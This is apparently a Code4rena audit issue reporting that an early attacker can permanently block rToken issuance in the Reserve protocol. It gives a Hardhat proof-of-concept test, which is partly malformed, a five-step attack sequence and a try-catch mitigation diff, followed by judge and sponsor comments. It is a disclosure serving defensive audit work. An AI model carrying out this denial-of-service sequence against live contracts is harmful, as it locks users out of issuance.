code-423n4 / 2023-02-reserve-mitigation-contest-findings

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Early attacker can DOS rToken issuance #13

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


An early attacker can DOS the issue functionality in the RToken contract.

No issuances can be made. And the DOS cannot be recovered from. It is permanent.

Proof of Concept

You can add the following test to the Furnace.test.ts file and execute it with yarn hardhat test --grep 'M-05 Mitigation Error: DOS issue'.

describe('M-05 Mitigation Error', () => {
    beforeEach(async () => {
      // Approvals for issuance
      await token0.connect(addr1).approve(rToken.address, initialBal)
      await token1.connect(addr1).approve(rToken.address, initialBal)
      await token2.connect(addr1).approve(rToken.address, initialBal)
      await token3.connect(addr1).approve(rToken.address, initialBal)

      await token0.connect(addr2).approve(rToken.address, initialBal)
      await token1.connect(addr2).approve(rToken.address, initialBal)
      await token2.connect(addr2).approve(rToken.address, initialBal)
      await token3.connect(addr2).approve(rToken.address, initialBal)

      // Issue tokens
      const issueAmount: BigNumber = bn('100e18')
      // await rToken.connect(addr1).issue(issueAmount)
      // await rToken.connect(addr2).issue(issueAmount)

    it('M-05 Mitigation Error: DOS issue', async () => {
      /* attack vector actually so bad that attacker can block issuance a loooong time?
      console.log("Total supply");
      console.log(await rToken.totalSupply());

      const issueAmount: BigNumber = bn('1e17')
      await rToken.connect(addr1).issue(issueAmount)

      console.log("Total supply");
      console.log(await rToken.totalSupply());

      const transferAmount: BigNumber = bn('1e16')
      rToken.connect(addr1).transfer(furnace.address, transferAmount);

      await advanceTime(3600);

      await furnace.connect(addr1).melt()

      await advanceTime(3600);

      console.log("rToken balance of furnace");
      console.log(await rToken.balanceOf(furnace.address));

      /* rToken can not be issued

      await expect(rToken.connect(addr1).issue(issueAmount))'rToken supply too low to melt')

      console.log("rToken balance of furnace");
      console.log(await rToken.balanceOf(furnace.address));

      /* rToken can not be issued even after time passes

      await advanceTime(3600);

      await expect(rToken.connect(addr1).issue(issueAmount))'rToken supply too low to melt')

      /* rToken.melt cannot be called directly either

      await expect(rToken.connect(addr1).melt(transferAmount))'rToken supply too low to melt')

The attack performs the following steps:

  1. Issue 1e17 rToken
  2. Transfer 1e16 rToken to the furnace
  3. Wait 12 seconds and call Furnace.melt such that the furnace takes notice of the transferred rToken and can pay them out later
  4. Wait at least 12 seconds such that the furnace would actually call RToken.melt
  5. Now RToken.issue and RToken.melt are permanently DOSed

Tools Used


Recommended Mitigation Steps

Use a try-catch block for furnace.melt in the RToken.issueTo function.

diff --git a/contracts/p1/RToken.sol b/contracts/p1/RToken.sol
index 616b1532..fc584688 100644
--- a/contracts/p1/RToken.sol
+++ b/contracts/p1/RToken.sol
@@ -129,7 +129,7 @@ contract RTokenP1 is ComponentP1, ERC20PermitUpgradeable, IRToken {
         // Ensure SOUND basket
         require(basketHandler.status() == CollateralStatus.SOUND, "basket unsound");

-        furnace.melt();
+        try main.furnace().melt() {} catch {}
         uint256 supply = totalSupply();

         // Revert if issuance exceeds either supply throttle

The only instance when furnace.melt reverts is when the totalSupply is too low. But then it is ok to catch the exception and just continue with the issuance and potentially lose rToken appreciation.

Potentially losing some rToken appreciation is definitely better than having this attack vector.

The RToken.redeemTo function already has the call to the furnance.melt function wrapped in a try-catch block. So redemption cannot be DOSed.

tbrent commented 1 year ago

Dupe of #70

c4-sponsor commented 1 year ago

tbrent marked the issue as sponsor confirmed

c4-judge commented 1 year ago

0xean marked the issue as satisfactory

c4-judge commented 1 year ago

0xean marked the issue as selected for report

c4-judge commented 1 year ago

0xean marked the issue as primary issue